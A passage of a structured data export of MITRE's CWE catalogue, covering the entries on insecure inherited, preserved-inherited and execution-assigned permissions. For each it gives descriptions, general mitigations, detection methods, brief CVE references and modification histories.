"ModificationDate": "2020-12-10",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2021-07-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2021-10-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2022-04-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2022-06-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Taxonomy_Mappings",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes, Relationships",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": "Suggested mappings to ISA/IEC 62443.",
"ContributionDate": "2023-04-25",
"ContributionName": "\"Mapping CWE to 62443\" Sub-Working Group",
"ContributionOrganization": "CWE-CAPEC ICS/OT SIG",
"ContributionReleaseDate": null,
"ContributionType": "Content",
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2009-05-27",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Insecure Default Permissions",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "732",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] |
[
{
"Description": null,
"Ordinality": "Primary"
}
] |
[
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tCost effective for partial coverage:\n```\n\n\t\tInter-application Flow Analysis",
"DetectionMethodID": null,
"Effectiveness": "SOAR Partial",
"EffectivenessNotes": null,
"Method": "Automated Static Analysis - Binary or Bytecode"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tCost effective for partial coverage:\n```\n\n\t\tBinary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies",
"DetectionMethodID": null,
"Effectiveness": "SOAR Partial",
"EffectivenessNotes": null,
"Method": "Manual Static Analysis - Binary or Bytecode"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tCost effective for partial coverage:\n```\n\n\t\tHost-based Vulnerability Scanners - Examine configuration for flaws, verifying that audit mechanisms work, ensure host configuration meets certain predefined criteria\n\t\tWeb Application Scanner\n\t\tWeb Services Scanner\n\t\tDatabase Scanners",
"DetectionMethodID": null,
"Effectiveness": "SOAR Partial",
"EffectivenessNotes": null,
"Method": "Dynamic Analysis with Automated Results Interpretation"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tHighly cost effective:\n```\n\n\t\tHost Application Interface Scanner\n\t```\n\t\tCost effective for partial coverage:\n```\n\n\t\tFuzz Tester\n\t\tFramework-based Fuzzer\n\t\tAutomated Monitored Execution\n\t\tForced Path Execution",
"DetectionMethodID": null,
"Effectiveness": "High",
"EffectivenessNotes": null,
"Method": "Dynamic Analysis with Manual Results Interpretation"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tHighly cost effective:\n```\n\n\t\tManual Source Code Review (not inspections)\n\t```\n\t\tCost effective for partial coverage:\n```\n\n\t\tFocused Manual Spotcheck - Focused manual analysis of source",
"DetectionMethodID": null,
"Effectiveness": "High",
"EffectivenessNotes": null,
"Method": "Manual Static Analysis - Source Code"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tCost effective for partial coverage:\n```\n\n\t\tContext-configured Source Code Weakness Analyzer",
"DetectionMethodID": null,
"Effectiveness": "SOAR Partial",
"EffectivenessNotes": null,
"Method": "Automated Static Analysis - Source Code"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tCost effective for partial coverage:\n```\n\n\t\tConfiguration Checker",
"DetectionMethodID": null,
"Effectiveness": "SOAR Partial",
"EffectivenessNotes": null,
"Method": "Automated Static Analysis"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tHighly cost effective:\n```\n\n\t\tFormal Methods / Correct-By-Construction\n\t```\n\t\tCost effective for partial coverage:\n```\n\n\t\tInspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)",
"DetectionMethodID": null,
"Effectiveness": "High",
"EffectivenessNotes": null,
"Method": "Architecture or Design Review"
}
] | null | null | null |
Medium
| null | 2
|
[
[
"284",
"285",
"732",
"276"
],
[
"664",
"668",
"732",
"276"
]
] |
[] |
277
|
Insecure Inherited Permissions
|
Variant
|
Simple
|
Draft
|
A product defines a set of insecure permissions that are inherited by objects that are created by the program.
| null |
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
}
] | null |
[
{
"Note": null,
"Phase": "Architecture and Design"
},
{
"Note": "REALIZATION: This weakness is caused during implementation of an architectural security tactic.",
"Phase": "Implementation"
},
{
"Note": null,
"Phase": "Operation"
}
] |
[
{
"Impact": [
"Read Application Data",
"Modify Application Data"
],
"Likelihood": null,
"Note": null,
"Scope": [
"Confidentiality",
"Integrity"
]
}
] |
[
{
"Description": "Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": "MIT-1",
"Phase": [
"Architecture and Design",
"Operation"
],
"Strategy": null
},
{
"Description": "\n\nCompartmentalize the system to have \"safe\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.\n\n\nEnsure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges.\n",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": "MIT-46",
"Phase": [
"Architecture and Design"
],
"Strategy": "Separation of Privilege"
}
] |
[
{
"Description": "User's umask is used when creating temp files.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2005-1841",
"Reference": "CVE-2005-1841"
},
{
"Description": "Insecure umask for core dumps [is the umask preserved or assigned?].",
"Link": "https://www.cve.org/CVERecord?id=CVE-2002-1786",
"Reference": "CVE-2002-1786"
}
] | null |
[
{
"EntryID": null,
"EntryName": "Insecure inherited permissions",
"MappingFit": null,
"TaxonomyName": "PLOVER"
}
] | null | null | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2006-07-19",
"SubmissionName": "PLOVER",
"SubmissionOrganization": null,
"SubmissionReleaseDate": "2006-07-19",
"SubmissionVersion": "Draft 3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Time_of_Introduction",
"ModificationDate": "2008-07-01",
"ModificationName": "Eric Dalci",
"ModificationOrganization": "Cigital",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Taxonomy_Mappings",
"ModificationDate": "2008-09-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2012-10-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2014-07-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Modes_of_Introduction, Relationships",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2020-12-10",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "732",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null | null | null | null | null | null | null | 2
|
[
[
"284",
"285",
"732",
"277"
],
[
"664",
"668",
"732",
"277"
]
] |
[] |
278
|
Insecure Preserved Inherited Permissions
|
Variant
|
Simple
|
Incomplete
|
A product inherits a set of insecure permissions for an object, e.g. when copying from an archive file, without user awareness or involvement.
| null |
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
}
] | null |
[
{
"Note": null,
"Phase": "Architecture and Design"
},
{
"Note": null,
"Phase": "Operation"
}
] |
[
{
"Impact": [
"Read Application Data",
"Modify Application Data"
],
"Likelihood": null,
"Note": null,
"Scope": [
"Confidentiality",
"Integrity"
]
}
] |
[
{
"Description": "Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": "MIT-1",
"Phase": [
"Architecture and Design",
"Operation"
],
"Strategy": null
},
{
"Description": "\n\nCompartmentalize the system to have \"safe\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.\n\n\nEnsure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges.\n",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": "MIT-46",
"Phase": [
"Architecture and Design"
],
"Strategy": "Separation of Privilege"
}
] |
[
{
"Description": "Does not obey specified permissions when exporting.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2005-1724",
"Reference": "CVE-2005-1724"
}
] | null |
[
{
"EntryID": null,
"EntryName": "Insecure preserved inherited permissions",
"MappingFit": null,
"TaxonomyName": "PLOVER"
}
] | null | null | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2006-07-19",
"SubmissionName": "PLOVER",
"SubmissionOrganization": null,
"SubmissionReleaseDate": "2006-07-19",
"SubmissionVersion": "Draft 3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Time_of_Introduction",
"ModificationDate": "2008-07-01",
"ModificationName": "Eric Dalci",
"ModificationOrganization": "Cigital",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Taxonomy_Mappings",
"ModificationDate": "2008-09-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2012-10-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2014-07-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2020-12-10",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "732",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null | null | null | null | null | null | null | 2
|
[
[
"284",
"285",
"732",
"278"
],
[
"664",
"668",
"732",
"278"
]
] |
[] |
279
|
Incorrect Execution-Assigned Permissions
|
Variant
|
Simple
|
Draft
|
While it is executing, the product sets the permissions of an object in a way that violates the intended permissions that have been specified by the user.
| null |
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
}
] | null |
[
{
"Note": "REALIZATION: This weakness is caused during implementation of an architectural security tactic.",
"Phase": "Implementation"
},
{
"Note": null,
"Phase": "Architecture and Design"
},
{
"Note": null,
"Phase": "Operation"
}
] |
[
{
"Impact": [
"Read Application Data",
"Modify Application Data"
],
"Likelihood": null,
"Note": null,
"Scope": [
"Confidentiality",
"Integrity"
]
}
] |
[
{
"Description": "Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": "MIT-1",
"Phase": [
"Architecture and Design",
"Operation"
],
"Strategy": null
},
{
"Description": "\n\nCompartmentalize the system to have \"safe\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.\n\n\nEnsure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges.\n",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": "MIT-46",
"Phase": [
"Architecture and Design"
],
"Strategy": "Separation of Privilege"
}
] |
[
{
"Description": "Log files opened read/write.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2002-0265",
"Reference": "CVE-2002-0265"
},
{
"Description": "Log files opened read/write.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2003-0876",
"Reference": "CVE-2003-0876"
},
{
"Description": "Log files opened read/write.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2002-1694",
"Reference": "CVE-2002-1694"
}
] | null |
[
{
"EntryID": null,
"EntryName": "Insecure execution-assigned permissions",
"MappingFit": null,
"TaxonomyName": "PLOVER"
},
{
"EntryID": "FIO06-C",
"EntryName": "Create files with appropriate access permissions",
"MappingFit": null,
"TaxonomyName": "CERT C Secure Coding"
},
{
"EntryID": "FIO01-J",
"EntryName": "Create files with appropriate access permission",
"MappingFit": null,
"TaxonomyName": "The CERT Oracle Secure Coding Standard for Java (2011)"
}
] |
[
"81"
] | null | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2006-07-19",
